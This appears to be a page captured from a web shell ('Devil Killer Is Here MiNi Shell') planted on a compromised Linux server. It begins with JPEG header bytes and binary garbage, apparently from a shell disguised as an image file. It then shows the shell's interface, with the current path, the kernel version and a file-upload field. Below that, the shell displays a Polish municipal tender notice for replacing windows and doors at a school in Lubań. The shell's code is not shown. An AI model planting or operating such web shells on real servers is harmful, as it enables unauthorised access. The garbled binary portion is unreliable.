JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220512/0015611801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Termomodernizacja budynku Szkoły Podstawowej nr 2 przy ul. Rybackiej 16 <br/>w Lubaniu – Gmina Miejska Lubań </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Lubań</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821380</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">7 Dywizji 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lubań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">75 6464499</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">boi.um@miastoluban.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.luban.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - związek jednostek samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Termomodernizacja budynku Szkoły Podstawowej nr 2 przy ul. Rybackiej 16 <br/>w Lubaniu – Gmina Miejska Lubań </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-77b50a0a-d1e2-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00156118</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00005120/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Kompleksowa termomodernizacja energetyczna budynków użyteczności publicznej na terenie Gminy Miejskiej Lubań, Gminy Gromadka, Gminy i Miasta Lwówek Śląski oraz Powiatu Lwóweckiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Kompleksowa termomodernizacja energetyczna budynków użytecznosci publicznej na terenie Gminy Miejskiej Lubań, Gminy Gromadka, Gminy i Miasta Lwówek Śląski oraz Powiatu Lwóweckiego , Regionalny Program Operacyjny Województwa Dolnośląskiego 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.miastoluban.pl/urzad,m,10439,ogloszenia-o-zamowieniach.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://bip.miastoluban.pl/urzad,m,10439,ogloszenia-o-zamowieniach.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia i w konkursie, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie p.z.p., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2019 r. poz. 123 i 730). <br/>2.	Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>3. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym <br/> a Wykonawcami odbywa się drogą elektroniczną przy użyciu mini portalu<br/> https://miniportal.uzp.gov.pl/, ePUAP pod adresem: https://epuap.gov.pl/wsp/portal,<br/> adres skrytki: /umluban/SkrytkaESP, <br/> 4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia<br/> publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP<br/> ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/> formularza do komunikacji.<br/> 5. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji <br/> elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania <br/> z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx <br/> oraz Regulaminie ePUAP. <br/>6.	Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia <br/> publicznego, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy<br/> do: złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB. <br/>8. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, <br/> podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz <br/> innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu,<br/> przyjmuje się datę ich przekazania na ePUAP. <br/>9. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta <br/> Wykonawcy i załączniki do oferty) odbywa się elektronicznie za pośrednictwem <br/> dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal <br/> (Formularz do komunikacji). Korespondencja przesłana za pomocą tego formularza nie<br/> może być szyfrowana. We wszelkiej korespondencji związanej z niniejszym <br/> postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP). <br/>10. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty <br/> elektronicznej, email: boi.um@miastoluban.pl <br/>11. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i ust. 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), tzw. &#34;RODO&#34;, Administrator Danych informuje, że: <br/>2. Administratorem Pani / Pana danych osobowych jest Urząd Miasta Lubań reprezentowany przez Burmistrza Miasta Lubań. Z administratorem danych można się kontaktować: <br/>1) pod adresem korespondencyjnym : ul. 7 Dywizji 14, 59-800 Lubań <br/>2) pod adresem poczty elektronicznej : boi.um@miastoluban.pl <br/>3.	Inspektorem Ochrony Danych Osobowych w Urzędzie Miasta Lubań jest Pan Ryszard Skowron. W każdym przypadku osoba, której dane dotyczą, może również skontaktować się bezpośrednio z inspektorem ochrony danych: <br/>1) elektronicznie pod adresem poczty elektronicznej : ido@miastoluban.pl <br/>2) na wyżej podany adres korespondencyjny z dopiskiem : inspektor ochrony danych, <br/>4.	Administrator przetwarza podane przez osobę dane osobowe w celu: <br/>1) związanym z postępowaniem o udzielenie zamówienia publicznego zgodnie z ustawą Prawo zamówień publicznych: <br/>a) dokonania oceny i wyboru oferty Wykonawcy (np. ocena kwalifikacji i doświadczenia wykonawcy), <br/>(b) ułatwienia kontaktu z wykonawcą, zawarcia umowy na podstawie złożonej oferty, (c) podjęcie czynności zmierzających do zawarcia umowy, niezbędność do zawarcia umowy, <br/>d) obowiązki prawne ciążące na administratorze np. co do przechowywania dokumentacji. Ponadto administrator nie dokonuje profilowania po uzyskaniu danych osobowych podanych przez osobę. <br/>5. Podstawą przetwarzania Pani / Pana danych osobowych jest: art. 6 ust. 1 lit. b) RODO dla celu w punkcie 1 litera c, (2) art. 6 ust. 1 lit. c) RODO dla celu w punkcie 1 litera d, (3) art. 2 ust. 2 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych dla celów w punkcie 1 litery c i d, <br/>6. Dane osobowe mogą być ujawniane podmiotom uprawnionym, którym będzie udostępniona dokumentacja postępowania, wykonawcom oraz osobom zainteresowanym w oparciu o przepisy prawa (np. dostęp do informacji publicznej), a także podmiotom przetwarzającym dane na podstawie zawartych umów powiązanych z przedmiotem niniejszego postępowania; administrator działając w granicach przepisów prawa zapewni poszanowanie prywatności osób, których dane zostały zawarte w ofercie.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.14.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część Nr 1: Wymiana istniejącej stolarki okiennej i zewnętrznej stolarki drzwiowej.<br/>Przedmiotem zamówienia są roboty budowlane w budynku Szkoły Podstawowej nr 2 w Lubaniu, związane z wymianą istniejącej stolarki okiennej na nową wykonaną z profili PVC o współczynniku Uw&lt;0,9 W/(m2K) z higrosterowanymi nawiewnikami okiennymi o wydajności min. 30m3/h i zewnętrznej stolarki drzwiowej na nową wykonaną z profili „ciepłego aluminium”. <br/><br/>1)	Zakres robót związanych z wymianą stolarki okiennej obejmuje:<br/>a)	ostrożny demontaż istniejącej stolarki okiennej, bez naruszenia istniejących wewnętrznych lastrykowych parapetów okiennych i zewnętrznych blaszanych podokienników<br/>b)	oczyszczenie i przygotowanie otworów do montażu<br/>c)	montaż nowej stolarki na odpowiednio dobrane kotwy<br/>d)	uszczelnienie szczelin montażowych wokół nowych ram pianą montażową<br/>e)	regulacja obsadzonej stolarki okiennej<br/>f)	utylizacja okien pochodzących z rozbiórki (wywiezienie na składowisko potwierdzone dokumentem przyjęcia odpadu)<br/><br/>2)	Zestawienie stolarki okiennej:<br/>a) okno (O1) 156x207 cm – uchylno-rozwierne, dwudzielne, dwurzędowe, kolor biały,<br/> Uw&lt;0,9 W/(m2K), g≥ 50%, Lt≥74%, Rw 32-35 dB, nawiewnik okienny <br/> higrosterowany 4 szt. o wydajności min. 30m3/h 153 szt.<br/>b)	okno (O2) 156x154 cm – uchylno-rozwierne, dwudzielne, jednorzędowe, kolor biały,<br/>Uw&lt;0,9 W/(m2K), g≥ 50%, Lt≥74%, Rw 32-35 dB, nawiewnik okienny <br/>higrosterowany 2 szt. o wydajności min. 30m3/h 17 szt.<br/>c)	okno (O3) 156x100 cm – uchylno-rozwierne, dwudzielne, jednorzędowe, kolor biały,<br/>Uw&lt;0,9 W/(m2K), g≥ 50%, Lt≥74%, Rw 32-35 dB, nawiewnik okienny <br/>higrosterowany 2 szt. o wydajności min. 30m3/h 34 szt.<br/>d)	okno (O4) 156x90 cm – uchylno-rozwierne, dwudzielne, jednorzędowe, kolor biały,<br/>Uw&lt;0,9 W/(m2K), g≥ 50%, Lt≥74%, Rw 32-35 dB, nawiewnik okienny <br/>higrosterowany 2 szt. o wydajności min. 30m3/h 2 szt.<br/>e)	okno (O5) 155x132 cm – uchylno-rozwierne, dwudzielne, jednorzędowe, kolor biały,<br/>Uw&lt;0,9 W/(m2K), g≥ 50%, Lt≥74%, Rw 32-35 dB, nawiewnik okienny <br/>higrosterowany 2 szt. o wydajności min. 30m3/h 5 szt.<br/>f)	okno (O6) 110x110 cm – uchylno-rozwierne, jednodzielne, jednorzędowe, kolor biały,<br/>Uw&lt;0,9 W/(m2K), g≥ 50%, Lt≥74%, Rw 32-35 dB, nawiewnik okienny <br/>higrosterowany 1 szt. o wydajności min. 30m3/h 5 szt.<br/>g)	okno (O7) 124x124 cm – uchylno-rozwierne, jednodzielne, jednorzędowe, kolor biały,<br/>Uw&lt;0,9 W/(m2K), g≥ 50%, Lt≥74%, Rw 32-35 dB, nawiewnik okienny <br/>higrosterowany 1 szt. o wydajności min. 30m3/h 3 szt.<br/>h)	okno (O8) 207x144 cm – uchylno-rozwierne, dwudzielne, jednorzędowe, kolor biały,<br/>Uw&lt;0,9 W/(m2K), g≥ 50%, Lt≥74%, Rw 32-35 dB, nawiewnik okienny <br/>higrosterowany 2 szt. o wydajności min. 30m3/h 2 szt.<br/>i)	okno (O9) 207x244 cm – rozwierne, jednoskrzydłowe z naświetlem górnym<br/>i naświetlami bocznymi kolor biały, Uw&lt;0,9 W/(m2K), g≥ 50%, Lt≥74%, <br/>Rw 32-35 dB, nawiewnik okienny higrosterowany 1 szt. o wydajności min. 30m3/h 6 szt.<br/>j)	okno (O10) 156x207 cm – nie podlega wymianie 3 szt.<br/>k)	okno (O11) 156x154 cm – nie podlega wymianie 1 szt.<br/>l)	okno (O12) 60x60 cm – nie podlega wymianie 2 szt.<br/>	<br/>Wymiana stolarki okiennej nie może spowodować uszkodzeń elewacji w ościeżach, zewnętrznych blaszanych podokienników oraz wewnętrznych lastrykowych parapetów. Elementów tych nie objęto zakresem robót. Demontaż należy wykonać ostrożnie wyjmując ościeżnice do wewnątrz.<br/><br/>3)	Zakres robót związanych z wymianą stolarki drzwiowej obejmuje:<br/>a)	ostrożny demontaż istniejącej stolarki drzwiowej<br/>b)	oczyszczenie i przygotowanie otworów do montażu<br/>c)	montaż nowej stolarki na odpowiednio dobrane kotwy<br/>d)	uszczelnienie szczelin montażowych wokół nowych ram pianą montażową<br/>e)	regulacja obsadzonej stolarki drzwiowej<br/>f)	utylizacja drzwi pochodzących z rozbiórki (wywiezienie na składowisko potwierdzone dokumentem przyjęcia odpadu)<br/><br/>4)	Zestawienie stolarki drzwiowej:<br/>a)	drzwi (DW1) 107x205 cm – pełne, jednoskrzydłowe, kolor biały, otwierane na zewnątrz, lewe, kształtowniki aluminiowe z przegrodą termiczną, panel gładki, zamek trzypunktowy automatyczny z blokowanymi językami, wkładka atestowana antywłamaniowa z pięcioma kluczami, klamka w kolorze drzwi, zawiasy rolkowe malowane w kolorze drzwi, profil podprogowy tworzywowy do ,,ciepłego montażu”, system uszczelnień obwodowy – 1 szt.<br/>b)	drzwi (DW2) 113x205 cm – pełne, jednoskrzydłowe, kolor biały, otwierane na zewnątrz, lewe, kształtowniki aluminiowe z przegrodą termiczną, panel gładki, zamek trzypunktowy automatyczny z blokowanymi językami, wkładka atestowana antywłamaniowa z pięcioma kluczami, klamka w kolorze drzwi, zawiasy rolkowe malowane w kolorze drzwi, profil podprogowy tworzywowy do ,,ciepłego montażu”, system uszczelnień obwodowy – 1 szt.<br/>c)	drzwi (DW3) 113x205 cm – pełne, jednoskrzydłowe, kolor biały, otwierane na zewnątrz, lewe, kształtowniki aluminiowe z przegrodą termiczną, panel gładki, zamek trzypunktowy automatyczny z blokowanymi językami, wkładka atestowana antywłamaniowa z pięcioma kluczami, klamka w kolorze drzwi, zawiasy rolkowe malowane w kolorze drzwi, profil podprogowy tworzywowy do ,,ciepłego montażu”, system uszczelnień obwodowy - 1 szt.<br/>d)	drzwi (DW4) 80x205 cm – pełne, jednoskrzydłowe, kolor biały, otwierane do wewnątrz, prawe, kształtowniki aluminiowe z przegrodą termiczną, panel gładki, zamek trzypunktowy automatyczny z blokowanymi językami, wkładka atestowana antywłamaniowa z pięcioma kluczami, klamka w kolorze drzwi, zawiasy rolkowe malowane w kolorze drzwi, profil podprogowy tworzywowy do ,,ciepłego montażu”, system uszczelnień obwodowy - 1 szt.<br/>e)	drzwi (DW5) 410x290 cm – przeszkolone, z naświetlem górnym i naświetlami bocznymi, dwuskrzydłowe, kolor biały, otwierane na zewnątrz, lewe/prawe, kształtowniki aluminiowe z przegrodą termiczną, panel gładki, zamek trzypunktowy automatyczny z blokowanymi językami i funkcją dzienną, wkładka atestowana antywłamaniowa z pięcioma kluczami, klamka/uchwyt w kolorze drzwi, zawiasy rolkowe malowane w kolorze drzwi, profil podprogowy tworzywowy do ,,ciepłego montażu”, system uszczelnień obwodowy – 1 kpl.<br/>f)	drzwi (DW6) 110x210 cm – pełne, jednoskrzydłowe, kolor biały, otwierane na zewnątrz, lewe -1 szt., prawe -1 szt. kształtowniki aluminiowe z przegrodą termiczną, panel gładki, zamek trzypunktowy automatyczny z blokowanymi językami, wkładka atestowana antywłamaniowa z pięcioma kluczami, klamka w kolorze drzwi, zawiasy rolkowe malowane w kolorze drzwi, profil podprogowy tworzywowy do ,,ciepłego montażu”, system uszczelnień obwodowy - 2 szt.<br/>g)	drzwi (DW7) 153x290 cm – przeszklone, półtoraskrzydłowe z naświetlem 70 cm, kolor biały, otwierane na zewnątrz, kształtowniki aluminiowe z przegrodą termiczną, panel gładki, zamek, szyna do drzwi dwuskrzydłowych z wbudowanym koordynatorem kolejności zamykania skrzydeł, wkładka atestowana antywłamaniowa z pięcioma kluczami, klamka w kolorze drzwi, zawiasy rolkowe malowane w kolorze drzwi, profil podprogowy tworzywowy do ,,ciepłego montażu”, system uszczelnień obwodowy – 1 szt.<br/>h)	drzwi (DW8) 80x205 cm – pełne, jednoskrzydłowe, kolor biały, otwierane na zewnątrz, lewe, kształtowniki aluminiowe z przegrodą termiczną, panel gładki, zamek trzypunktowy automatyczny z blokowanymi językami, wkładka atestowana antywłamaniowa z pięcioma kluczami, klamka w kolorze drzwi, zawiasy rolkowe malowane w kolorze drzwi, profil podprogowy tworzywowy do ,,ciepłego montażu”, system uszczelnień obwodowy – 2 szt.<br/>i)	drzwi (DG) 230x205 cm – nie podlegają wymianie 1 szt.<br/>Wymiana stolarki drzwiowej nie może spowodować uszkodzeń elewacji w ościeżach. Elementów tych nie objęto zakresem robót. Demontaż należy wykonać ostrożnie wyjmując ościeżnice do wewnątrz. Współczynnik przenikania ciepła U&lt;1,3 W/(m2K). <br/>Zakres robót obejmuje wymianę istniejącej stolarki okiennej i drzwiowej z montażem w podstawowym zakresie, bez robót tynkarskich i malarskich związanych z naprawą ościeży okiennych i drzwiowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45421132-8 - Instalowanie okien</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45421131-1 - Instalowanie drzwi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres wydlużonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa 